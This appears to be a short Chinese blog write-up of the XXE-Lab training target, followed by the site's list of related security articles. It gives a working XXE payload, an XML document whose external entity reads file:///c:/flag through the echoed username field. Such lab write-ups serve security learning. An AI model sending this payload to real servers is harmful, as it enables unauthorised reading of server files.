XXE-Lab靶场（自用）

最新推荐文章于 2026-01-02 22:31:32 发布

原创最新推荐文章于 2026-01-02 22:31:32 发布 · 119 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全

打开提供的靶机网址

随意输入账户密码，并抓包

发现回显位置在账户名称上，且格式神似XML，尝试使用XML注入漏洞

构建以下语句

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY name SYSTEM "file:///c:/flag">
]>
 
<user><username>&name;</username><password>1</password></user>

并发送包

取得Flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Paper_F1nd

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

xxe-Lab靶场通关攻略

qq_65379983的博客

03-10

475

xxe-lab 获取某文件内容

XXE-lab靶场搭建

MateSnake的博客

05-11

1001

XXE-lab靶场搭建

参与评论您还未登录，请先登录后发表或查看评论

XXE-lab-master靶场：PHP_xxe

weixin_68416970的博客

07-30

1994

XXE-lab-master：PHP_xxe的练习教程

xxe-lab靶场安装和简单php代码审计

永远是少年

12-23

3987

XXE-Lab靶场通关攻略

2301_81383433的博客

03-10

223

将其中的php_xxe文件放到网站根目录

xxe-lab 通关攻略

2302_77611368的博客

03-10

342

XML外部实体注⼊（XML Extenrnal Entity Injection），简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引⽤，导致服务端在解析⽤户提交的XML信息时未作处理直接进⾏解析，导致加载恶意的外部⽂件和代码，造成任意⽂件读取，命令执⾏（利⽤条件苛刻)、内⽹扫描等危害。

XXE-labs靶场通关攻略

2401_82451607的博客

08-29

1161

XXE靶场通关攻略

【靶场】XXE-Lab xxe漏洞

qq_44936245的博客

06-08

610

本文记录了XXE-Lab靶场漏洞测试过程，仅做学习记录用，维护网络健康靠大家

xxe-labs靶场通关攻略

qq_54694921的博客

12-19

476

XEE-labs获取flag的三种方法

XXE-lab靶场：PHP_xxe

2403_87610673的博客

03-10

146

多次尝试发现用户名位置有回显，而后面密码字段就无回显。

精选资源

xxe-lab-master靶场下载安装包

09-10

xxe-lab-master靶场是一个专门用来模拟和研究XXE注入漏洞的环境，它通常包含了多种配置，旨在帮助安全专家理解和掌握XXE攻击的原理和防护方法。一个典型的XXE攻击过程涉及以下几个步骤：首先是识别目标应用是否...

HTTPS真的安全吗？—— 使用 mitmproxy 中间人攻击破解 GitHub 登录会话

最新发布

Bruce_xiaowei的博客

01-02

310

本文演示了使用mitmproxy对HTTPS加密通信进行中间人攻击的实验过程。通过搭建Mac主机与Win11虚拟机的网络环境，配置mitmproxy监听9090端口并安装CA证书，成功捕获GitHub登录过程中的明文密码。实验详细说明了代理设置、证书安装和流量捕获步骤，验证了在未正确验证证书的情况下，HTTPS传输的敏感信息仍可能被窃取。结果表明，仅依赖HTTPS不能完全保证通信安全，必须配合严格的证书验证机制。文章还提供了常见问题排查方法和实验命令参考。

无网环境下的终端登录安全：一个被忽视的等保盲区

安当加密

01-01

660

在等保2.0全面落地的今天，大多数企业已部署防火墙、EDR、日志审计等纵深防御体系。。尤其在的环境中（如监控室、工控机房、财务内网终端），这一风险被进一步放大。

安全通用要求之十安全运维管理

木矞的博客

12-27

842

责任、义务、风险、权限审批、权限分配、账户注销等)、配置文件的生成及备份、变更审批、授权访问、最小服务、升级与打补丁、审计日志管理、登录设备和系统的口令更新周期等方面。b)应制定安全事件报告和处置管理制度，明确不同安全事件的报告、处置和响应流程，规定安全事件的现场处理、事件报告和后期恢复的管理职责等。b)应建立配套设施软硬件维护方面的管理制度，对其维护进行有效管理，包括明确维护人员的责任、维修和服务的审批、维修过程的监督控制等。

安全隐私页面 Cordova&OpenHarmony 混合开发实战

2501_94444908的博客

12-29

480

本文介绍了家庭菜谱应用的安全隐私模块实现方案。该模块通过Cordova&OpenHarmony混合架构，Web层负责展示清理选项和确认对话框，ArkTS原生层执行实际数据操作。主要功能包括清除缓存和重置应用，通过不同按钮样式区分操作风险级别。清除缓存会删除临时文件，而重置应用则会清空所有菜谱数据。实现上采用"Web交互+原生执行"的安全分工模式，Web层处理用户确认和提示，原生层通过SecurityPlugin执行文件删除操作。该设计既保证了数据安全，又提供了良好的用户体验。

电子电器架构 --- 主机厂的安全理念（下）

Soly_kun的博客

12-29

200

摘要：本文以汽车电子工程师视角，探讨智能汽车时代的安全理念与实践。作者强调安全是主机厂的生命线，并重点分析了蔚来汽车的四大信息安全原则：最小权限原则从源头控制风险，零信任设计打破传统安全预设，分层纵深防御构建"云-管-端"防护体系。文章指出，在汽车智能化转型中，信息安全已成为维系用户信任的核心纽带，需要贯穿研发、生产、服务全流程。通过系统化的安全体系建设，才能应对日益复杂的网络安全挑战，守护用户生命财产安全。（149字）

Java 安全的单例模式详解

萧曳丶

01-01

353

单例模式是一种确保类只有一个实例并提供全局访问点的设计模式。文章详细介绍了多种实现方式：非安全的懒汉式、线程安全的饿汉式、同步方法懒汉式、双重检查锁、静态内部类以及枚举实现，并分析了各自的优缺点。特别强调了如何防止反射攻击、序列化破坏等安全隐患，提供了完整的安全单例示例。文章还比较了不同场景下的最佳实践方案，推荐简单场景用饿汉式，高安全要求用枚举实现，并介绍了现代Java中的Supplier和CompletableFuture实现方式。最后指出单例模式可能隐藏依赖关系、测试困难等问题，建议根据线程安全、性能

阿里千问安全审核大模型，本地部署，实测

12-29

708

大家好，我是 Ai 学习的老章

解锁高效安全办公新形态：信创云桌面的核心价值与行业实践

Raysync2025的博客

12-29

538

对于正走在信创深化之路上的组织而言，选择一个架构先进、生态开放、服务专业的云桌面平台，无疑将为未来的可持续发展奠定坚实的信息化基石。信创云桌面，并非简单的桌面环境虚拟化，而是以国产化核心技术为底座，构建的一套涵盖终端、接入、平台、应用与数据的完整体系。：采用高效的桌面传输协议，即使在复杂的专业图形设计、视频播放等场景下，也能保障用户获得接近本地PC的操作体验，且对网络带宽具备良好的适应性。：能够根据不同部门、岗位的需求，精准、敏捷地交付对应的桌面环境与应用，并对其全生命周期进行监控、优化与自动化管理。